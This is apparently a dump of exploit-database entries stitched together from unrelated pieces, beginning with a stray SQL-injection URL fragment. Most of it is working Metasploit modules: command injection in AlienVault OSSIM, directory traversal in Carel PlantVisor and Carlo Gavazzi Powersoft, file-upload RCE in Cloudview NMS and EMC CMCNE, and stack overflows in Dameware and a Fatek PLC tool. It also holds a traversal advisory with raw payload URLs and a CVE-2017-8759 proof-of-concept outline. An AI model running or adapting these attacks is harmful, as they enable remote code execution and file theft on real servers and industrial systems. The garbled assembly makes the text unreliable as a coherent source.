# http://localhost/[PATH]/bank?id=[SQL]&action=update
#
# Etc..
# # # # #
require 'msf/core'
require 'rexml/document'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'Alienvault OSSIM av-centerd Command Injection get_log_line',
'Description' => %q{
This module exploits a command injection flaw found in the get_log_line
function found within Util.pm. The vulnerability is triggered due to an
unsanitized $r_file parameter passed to a string which is then executed
by the system
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-3805' ],
[ 'OSVDB', '107992' ]
],
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' =>
{
'SSL' => true,
},
'Payload' =>
{
'Compat' => {
'RequiredCmd' => 'perl netcat-e openssl python gawk'
}
},
'DefaultTarget' => 0,
'Targets' =>
[
['Alienvault <= 4.7.0',{}]
],
'DisclosureDate' => 'Jul 18 2014'))
register_options([Opt::RPORT(40007)], self.class)
end
def check
version = ""
res = send_soap_request("get_dpkg")
if res &&
res.code == 200 &&
res.headers['SOAPServer'] &&
res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/
version = $1
end
if version.empty? || version >= "4.7.0"
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Appears
end
end
def build_soap_request(method)
xml = Document.new
xml.add_element(
"soap:Envelope",
{
"xmlns:xsi" => "http://www.w3.org/2001/XMLSchema-instance",
"xmlns:soapenc" => "http://schemas.xmlsoap.org/soap/encoding/",
"xmlns:xsd" => "http://www.w3.org/2001/XMLSchema",
"soap:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/",
"xmlns:soap" => "http://schemas.xmlsoap.org/soap/envelope/"
})
body = xml.root.add_element("soap:Body")
m = body.add_element(method, { 'xmlns' => "AV/CC/Util" })
args = []
args[0] = m.add_element("c-gensym3", {'xsi:type' => 'xsd:string'})
args[0].text = "All"
args[1] = m.add_element("c-gensym5", {'xsi:type' => 'xsd:string'})
args[1].text = "423d7bea-cfbc-f7ea-fe52-272ff7ede3d2"
args[2] = m.add_element("c-gensym7", {'xsi:type' => 'xsd:string'})
args[2].text = "#{datastore['RHOST']}"
args[3] = m.add_element("c-gensym9", {'xsi:type' => 'xsd:string'})
args[3].text = "#{rand_text_alpha(4 + rand(4))}"
args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
args[4].text = "/var/log/auth.log"
args[5] = m.add_element("c-gensym13", {'xsi:type' => 'xsd:string'})
perl_payload = "system(decode_base64"
perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
args[5].text = "1;perl -MMIME::Base64 -e '#{perl_payload}';"
xml.to_s
end
def send_soap_request(method, timeout=20)
soap = build_soap_request(method)
res = send_request_cgi({
'uri' => '/av-centerd',
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap,
'headers' => {
'SOAPAction' => "\"AV/CC/Util##{method}\""
}
}, timeout)
res
end
def exploit
send_soap_request("get_log_line", 1)
end
end
__END__
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub get_log_line {
my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file, $number_lines )
= @_;
verbose_log_file(
"GET LOG LINE : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$r_file)"
);
my @ret = ("$systemuuid");
if ( $r_file =~ /\.\./ ){
push(@ret,"File not auth");
return \@ret;
}
if ( $number_lines <= 0) {
push(@ret,"Error in number lines");
return \@ret;
}
if (( $r_file =~ /^\/var\/log\// ) or ( $r_file =~ /^\/var\/ossec\/alerts\// ) or ( $r_file =~ /^\/var\/ossec\/logs\// )){
if (! -f "$r_file" ){
push(@ret,"File not found");
return \@ret;
}
push(@ret,"ready");
my $command = "tail -$number_lines $r_file";
#push(@ret,"$command");
#my @content = `tail -$number_lines $r_file`;
my @content = `$command`;
push(@ret,@content);
return \@ret;
}
else {
push(@ret,"path not auth");
return \@ret;
}
}
Source: https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
Running CVE-2017-8759 exploit sample.
Flow of the exploit:
Word macro runs in the Doc1.doc file. The macro downloads a badly formatted txt file over wsdl, which triggers the WSDL parser log. Then the parsing log results in running mshta.exe which in turn runs a powershell commands that runs mspaint.exe
To test:
Run a webserver on port 8080, and put the files exploit.txt and cmd.hta on its root. For example python -m SimpleHTTPServer 8080
If all is good mspaint should run.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42711.zip
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Alienvault OSSIM av-centerd Util.pm sync_rserver Command Execution',
'Description' => %q{
This module exploits a command injection vulnerability found within the sync_rserver
function in Util.pm. The vulnerability is triggered due to an incomplete blacklist
during the parsing of the $uuid parameter. This allows for the escaping of a system
command allowing for arbitrary command execution as root
},
'References' =>
[
[ 'CVE', '2014-3804' ],
[ 'ZDI', '14-197' ],
[ 'URL', 'http://forums.alienvault.com/discussion/2690' ],
],
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Jun 11 2014')
register_options([
Opt::RPORT(40007),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('CMD', [ false, 'This is the file to download', 'touch /tmp/file.txt'])
], self.class)
end
def run
soap = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n"
soap += "<soap:Envelope xmlns:soap=\"http:\/\/schemas.xmlsoap.org/soap/envelope/\"\r\n"
soap += "xmlns:soapenc=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding/\" xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\r\n"
soap += "xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\r\n"
soap += "soap:encodingStyle=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\">\r\n"
soap += "<soap:Body>\r\n"
soap += "<sync_rserver xmlns=\"AV\/CC\/Util\">\r\n"
soap += "<c-gensym3 xsi:type=\"xsd:string\">All</c-gensym3>\r\n"
soap += "<c-gensym5 xsi:type=\"xsd:string\">& #{datastore['CMD']} </c-gensym5>\r\n"
soap += "<c-gensym7 xsi:type=\"xsd:string\">#{datastore['RHOST']}</c-gensym7>\r\n"
soap += "<c-gensym9 xsi:type=\"xsd:string\">#{Rex::Text.rand_text_alpha(4 + rand(4))}</c-gensym9>\r\n"
soap += "</sync_rserver>\r\n"
soap += "</soap:Body>\r\n"
soap += "</soap:Envelope>\r\n"
res = send_request_cgi(
{
'uri' => '/av-centerd',
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap,
'headers' => {
'SOAPAction' => "\"AV/CC/Util#sync_rserver\""
}
}, 20)
if res && res.code == 200
print_good("Command executed successfully!")
else
print_bad("Something went wrong...")
end
end
end
__END__
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub sync_rserver
{
my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname ) = @_;
verbose_log_file(
"SYNC RSERVER TASK : Received call from $uuid : ip source = $admin_ip, hostname = $hostname:($funcion_llamada,$nombre)"
);
if ($uuid =~ /[;`\$\<\>\|]/) {
console_log_file("Not allowed uuid: $uuid in sync_rserver\n");
my @ret = ("Error");
return \@ret;
}
my $conn = Avtools::get_database();
my $sqlfile = "/tmp/sync_${uuid}.sql";
my $sqlfile_old = "/tmp/sync_${uuid}.sql.old";
my $sqlfile_md5 = `md5sum $sqlfile | awk '{print \$1}'`;
my $sqlfile_content;
my $status = 1;
my $counter = 0;
my @ret;
my $query = qq{};
my $dbq;
if ( -f $sqlfile_old )
{
my $sqlfile_old_md5 = `md5sum $sqlfile_old | awk '{print \$1}'`;
debug_log_file ("Old MD5: $sqlfile_old_md5 New MD5: $sqlfile_md5");
if ( $sqlfile_md5 eq $sqlfile_old_md5 )
{
unlink $sqlfile;
verbose_log_file ("Already sync'ed!");
return "0";
}
else
{
unlink $sqlfile_old;
}
}
my $query_array = `ossim-db < $sqlfile 2>&1`;
$query_array =~ s/[\s\n]+$//g;
if ($query_array ne '')
{
$status = $query_array;
}
else
{
$status = 0;
}
if ( ! (defined $status) or $status == 0 )
{
if ( grep /RESTART\sOSSIM\-SERVER/, $sqlfile )
{
verbose_log_file("RESTART OSSIM-SERVER MARK found. Restarting ossim-server");
system('/etc/init.d/ossim-server restart');
}
else
{
debug_log_file("RESTART OSSIM-SERVER MARK not found. Skipping ossim-server restart");
}
$query = qq{REPLACE INTO alienvault.config (conf, value) VALUES ('latest_asset_change', utc_timestamp())};
debug_log_file($query);
$dbq = $conn->prepare($query);
$dbq->execute();
$dbq->finish();
}
else
{
verbose_log_file ("Error syncing rservers: ${status}");
}
debug_log_file("Move file: $sqlfile");
move ($sqlfile, $sqlfile . ".old");
# push @ret, "0";
return "0";
}
#######################################################################
Luigi Auriemma
Application: Carel PlantVisor
http://www.carel.com/carelcom/web/eng/catalogo/prodotto_dett.jsp?id_prodotto=310
Versions: <= 2.4.4
Platforms: Windows
Bug: directory traversal
Exploitation: remote
Date: 13 Sep 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's homepage:
"PlantVisor Enhanced is monitoring and telemaintenance software for
refrigeration and air-conditioning systems controlled by CAREL
instruments."
#######################################################################
======
2) Bug
======
CarelDataServer.exe is a web server listening on port 80.
The software is affected by a directory traversal vulnerability that
allows to download the files located on the disk where it's installed.
Both slash and backslash and their HTTP encoded values are supported.
#######################################################################
===========
3) The Code
===========
http://SERVER/..\..\..\..\..\..\boot.ini
http://SERVER/../../../../../../boot.ini
http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
http://SERVER/..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Carel Pl@ntVisor Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability
found in Carel Pl@ntVisor <= 2.4.4. The vulnerability is
triggered by sending a specially crafted GET request to the
victim server.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-3487' ],
[ 'BID', '49601' ],
],
'DisclosureDate' => 'Jun 29 2012'))
register_options(
[
OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
Opt::RPORT(80)
], self.class )
end
def run
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "/" + ("..%5c" * depth)
res = send_request_raw({
'method' => 'GET',
'uri' => "#{levels}#{datastore['FILE']}",
})
if res and res.code == 200
loot = res.body
if not loot or loot.empty?
print_status("File from #{rhost}:#{rport} is empty...")
return
end
file = ::File.basename(datastore['FILE'])
path = store_loot('plantvisor.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
print_status("Stored #{datastore['FILE']} to #{path}")
return
end
end
end
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Carlo Gavazzi Powersoft Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability
found in Carlo Gavazzi Powersoft <= 2.1.1.1. The vulnerability
is triggered when sending a specially crafted GET request to the
server. The location parameter of the GET request is not sanitized
and the sendCommand.php script will automatically pull down any
file requested
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://gleg.net/agora_scada_upd.shtml']
],
'DisclosureDate' => 'Jan 21 2015'))
register_options(
[
OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 8]),
OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin']),
OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin']),
Opt::RPORT(80)
], self.class )
end
def run
require 'base64'
credentials = Base64.encode64("#{datastore['USERNAME']}:#{datastore['PASSWORD']}")
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "/" + ("../" * depth)
res = send_request_raw({
'method' => 'GET',
'uri' => "#{levels}#{datastore['FILE']}?res=&valid=true",
'headers' => {
'Authorization' => "Basic #{credentials}"
},
})
if res and res.code == 200
loot = res.body
if not loot or loot.empty?
print_status("File from #{rhost}:#{rport} is empty...")
return
end
file = ::File.basename(datastore['FILE'])
path = store_loot('carlo.gavazzi.powersoft.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
print_status("Stored #{datastore['FILE']} to #{path}")
return
end
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info = {})
super(update_info(info,
'Name' => 'Cloudview NMS File Upload',
'Description' => %q{
This module exploits a file upload vulnerability
found within Cloudview NMS < 2.00b. The vulnerability
is triggered by sending specialized packets to the
server with directory traversal sequences (..@ in
this case) to browse outside of the web root.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', '0day' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Cloudview NMS 2.00b on Windows', {} ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 13 2014'))
register_options([
Opt::RPORT(80),
OptString.new('USERNAME', [ true, "The username to log in with", "Admin" ]),
OptString.new('PASSWORD', [ false, "The password to log in with", "" ])
], self.class )
end
def exploit
# setup
vbs_name = rand_text_alpha(rand(10)+5) + '.vbs'
exe = generate_payload_exe
vbs_content = Msf::Util::EXE.to_exe_vbs(exe)
mof_name = rand_text_alpha(rand(10)+5) + '.vbs'
mof = generate_mof(mof_name, vbs_name)
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
print_status("Uploading #{vbs_name} to #{peer}...")
# logging in to get the "session"
@sess = rand(0..2048)
res = send_request_cgi({
'method' => 'POST',
'uri' => "/MPR=#{@sess}:/",
'version' => '1.1',
'ctype' => 'application/x-www-form-urlencoded',
'data' => "username=#{datastore['USERNAME']}&password=#{datastore['PASSWORD']}&mybutton=Login%21&donotusejava=html"
})
# This is needed to setup the upload directory
res = send_request_cgi({
'method' => 'GET',
'uri' => "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@!-!-!@extdir%5Cfilelistpage!-!1000",
'version' => '1.1',
})
# Uploading VBS file
data = Rex::MIME::Message.new
data.add_part("#{vbs_content}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{vbs_name}\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
res = send_request_cgi({
'method' => 'POST',
'uri' => "/MPR=#{@sess}:/",
'version' => '1.1',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res.body =~ /Uploaded file OK/
print_good("Uploaded #{vbs_name} successfully!")
print_status("Uploading #{mof_name} to #{peer}...")
# Setting up upload directory
res = send_request_cgi({
'method' => 'GET',
'uri' => "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@wbem@mof@!-!-!@extdir%5Cfilelistpage!-!1000",
'version' => '1.1'
})
# Uploading MOF file
data = Rex::MIME::Message.new
data.add_part("#{mof}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{mof_name}\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
res = send_request_cgi({
'method' => 'POST',
'uri' => "/MPR=#{@sess}:/",
'version' => '1.1',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res.body =~ /Uploaded file OK/
print_good("Uploaded #{mof_name} successfully!")
else
print_error("Something went wrong...")
end
else
print_error("Something went wrong...")
end
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Dameware Mini Remote Control Username Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow vulnerability found
in Dameware Mini Remote Control v4.0. The overflow is caused when sending
an overly long username to the DWRCS executable listening on port 6129.
The username is read into a strcpy() function causing an overwrite of
the return pointer leading to arbitrary code execution.
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'CVE', '2005-2842' ],
[ 'BID', '14707' ],
[ 'URL', 'http://secunia.com/advisories/16655' ],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 140,
'BadChars' => "\x00\x0a\x0d",
'StackAdjustment' => -3500,
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'Compat' =>
{
'SymbolLookup' => '+ws2ord',
},
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN',
{
# msvcrt.dll
# push esp/ retn
'Ret' => 0x77c35459,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sept 01 2005'))
register_options(
[
Opt::RPORT(6129),
], self.class )
end
def pkt1
p = payload.encoded
boom = "\x43" * 259
boom[100, 4] = [target.ret].pack('V')
boom[108, p.length] = p
packet = "\x00" * 4056
packet[0, 4] = "\x30\x11\x00\x00"
packet[4, 4] = "\x00\x00\x00\x00"
packet[8, 4] = "\xd7\xa3\x70\x3d"
packet[12, 4] = "\x0a\xd7\x0d\x40"
packet[16, 20] = "\x00" * 20
packet[36, 4] = "\x01\x00\x00\x00"
packet[40, 4] = [0x00002710].pack('V')
packet[196, 259] = rand_text_alpha(259)
packet[456, 259] = boom
packet[716, 259] = rand_text_alpha(259)
packet[976, 259] = rand_text_alpha(259)
packet[1236, 259] = rand_text_alpha(259)
packet[1496, 259] = rand_text_alpha(259)
return packet
end
def pkt2
packet = "\x00" * 4096
packet[756, 259] = rand_text_alpha(259)
return packet
end
def exploit
connect
sock.put(pkt1)
sock.recv(1024)
sock.put(pkt2)
sock.recv(84)
handler
disconnect
end
end
__END__
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC CMCNE FileUploadController Remote Code Execution',
'Description' => %q{
This module exploits a fileupload vulnerability found in EMC
Connectrix Manager Converged Network Edition <= 11.2.1. The file
upload vulnerability is triggered when sending a specially crafted
filename to the FileUploadController servlet. This allows the
attacker to upload a malicious jsp file to anywhere on the remote
file system.
},
'License' => MSF_LICENSE,
'Author' => [ 'james fitts' ],
'References' =>
[
[ 'ZDI', '13-279' ],
[ 'CVE', '2013-6810' ]
],
'Privileged' => true,
'Platform' => 'win',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 18 2013'))
register_options([
Opt::RPORT(80)
], self.class)
end
def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
deploy = "..\\..\\..\\deploy\\dcm-client.war\\"
jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
@jsp_name = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
data = Rex::MIME::Message.new
data.add_part("#{jsp}", "application/octet-stream", nil, "form-data; name=\"source\"; filename=\"#{deploy}#{@jsp_name}\"")
data.add_part("#{rand_text_alpha_upper(5)}", nil, nil, "form-data; name=\"driverFolderName\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
print_status("#{peer} - Uploading the JSP Payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri("HttpFileUpload", "FileUploadController.do"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/
print_good("File uploaded successfully!")
print_status("Executing '#{@jsp_name}' now...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("dcm-client", "#{@jsp_name}")
})
else
print_error("Does not look like the files were uploaded to #{peer}...")
end
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Fatek Automation PLC WinProladder Stack-based Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in Fatek Automation
PLC WinProladder v3.11 Build 14701. The vulnerability is triggered when a client
connects to a listening server. The client does not properly sanitize the length
of the received input prior to placing it on the stack.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'ZDI', '16-672' ],
[ 'CVE', '2016-8377' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-350-01' ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 EN',
{
# CC3250MT.dll
# pop ecx/ pop ebp/ retn
'Ret' => 0x32514d79
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 15 2016'))
register_options(
[
OptPort.new('SRVPORT', [ true, "The port to listen on", 500])
], self.class)
end
def on_client_data(client)
p = payload.encoded
pkt = "A" * 10000
pkt[1092, 4] = [0x04eb9090].pack('V') # jmp $+6
pkt[1096, 4] = [target.ret].pack('V')
pkt[1100, 50] = "\x90" * 50
pkt[1150, p.length] = p
client.put(pkt)
handler
service.close_client(client)
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC CMCNE Inmservlets.war FileUploadController Remote Code Execution',
'Description' => %q{
This module exploits a file upload vulnerability found in EMC
Connectrix Manager Converged Network Edition <= 11.2.1. The file
upload vulnerability is triggered when sending a specially crafted
filename to the FileUploadController servlet found within the
Inmservlets.war archive. This allows the attacker to upload a
specially crafted file which leads to remote code execution in the
context of the server user.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'ZDI', '13-280' ],
[ 'CVE', '2013-6810' ]
],
'Privileged' => true,
'Platform' => 'win',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 18 2013'))
register_options([
Opt::RPORT(80)
], self.class)
end
def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
deploy = "..\\..\\..\\deploy\\dcm-client.war\\"
jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
@jsp_name = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
data = Rex::MIME::Message.new
data.add_part("#{jsp}", nil, nil, "form-data; name=\"ftproot\"; filename=\"#{deploy}#{@jsp_name}\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
print_status("#{peer} - Uploading the JSP Payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri("inmservlets", "FileUploadController"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'headers' => {
'ROOTDIR' => "ftproot"
}
})
if res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/
print_good("File uploaded successfully!")
print_status("Executing '#{@jsp_name}' now...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("dcm-client", "#{@jsp_name}")
})
else
print_error("Does not look like the files were uploaded to #{peer}...")
end
end
end